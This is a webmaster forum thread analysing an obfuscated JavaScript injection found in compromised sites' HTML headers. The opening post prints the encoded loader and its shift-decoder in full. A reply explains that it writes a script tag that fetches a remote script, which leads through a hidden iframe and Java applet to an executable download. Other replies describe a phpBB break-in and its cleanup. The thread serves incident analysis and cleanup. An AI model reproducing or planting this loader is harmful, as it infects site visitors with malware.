So today while checking around I found this in a html source file. The first part is what was there...the second part is the script enencoded. So I did a grep for 'document.write(unescape' and found a handful of sites that back in may/June were exploited. It seems this little script wrote itself to any files on the server that it had permission. A few of my sites have safe_mode off (very few) and those that had public write permissions (666 or 777) had this added to the header. I went and cleaned it all up. I and of course I corrected any files that were public write. Does anyone know anything more about what this piece of code is suppose to do? I know an exploit exists in IE that this code I think takes use of. Luckily I don't use IE Anyone want to take a stab at this? I bet I was exploited from phpbb before I updated. There was a week I took to do a critical update. When you have 200 sites and dozens of scripts it's hard to keep up with new updates and exploits. <script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C %61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%6 9%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73% 2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72 %20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%6 9%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28% 73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73 %2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%7 4%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E')); dF('*8HXHWNUY*75QFSLZFLJ*8I*7%3Cof%7Bfxhwnuy*7%3C*75XWH*8I*7%3Cmyyu*8F44gfwfxtx3 htr4ytu4ktyt3ox*7%3C*8J*8H4XHWNUY*8J*5I*5F5')</script> <script language=javascript>document.write(unescape('<script language="javascript"> funct%69on dF(s){var s1=unescape(s%2Esubstr(0,s.length-1)); vart='';for(i=0;i<s1.length;%69++)t+=String.fromCharCode(%731.charCodeAt(i)-s.substr(s.length-1,1));document.wri%74e(unescape(t));}</script>')); dF('*8HXHWNUY*75QFSLZFLJ*8I*7<of{fxhwnuy*7<*75XWH*8I*7<myyu*8F44gfwfxtx3htr4ytu4ktyt3ox*7<*8J*8H4XHWNUY*8J*5I*5F5')</script> Code (markup):
It's not IE - any browser that visits your site will be affected. This script encodes the following string <SCRIPT LANGUAGE='javascript' SRC='http:// *******.com/top/foto.js'></SCRIPT> , that will make any browser to go to their site (located in China) and pickup a bigger script. The bigger script will try to set a cookie called jkpopup and creates a hidden iframe that points to a PHP script on the same site. The source of iframe is yet another script, that encrypts HTML that loads a couple of other scripts and executes a Java applet, that pulls an executable from their website called web.exe. After this, your machine is under their total control. J.D.
When a huge exploit came out on phpbb that i didnt update quick enough my sites home page was taken down and they added an entire directory of scripts in my forum/ folder that allowed them to upload files to my server and steal all my bandwidth. I obviously new they had hacked me b/c they took down the home page.. so i was able to delete (what i think) was everything they added. hackers are the biggest scum on earth... like meth heads.
hmm..thanks for the info...I am glad I cleaned up my server. I sure wish I had found this earlier and luckily it was mostly written to weird pages that rarely get hit. I use Opera and I run AVG. I also have firewalls up at my house. I don't think the script did any serious harm. The hard part is making sure I have the exploit plugged.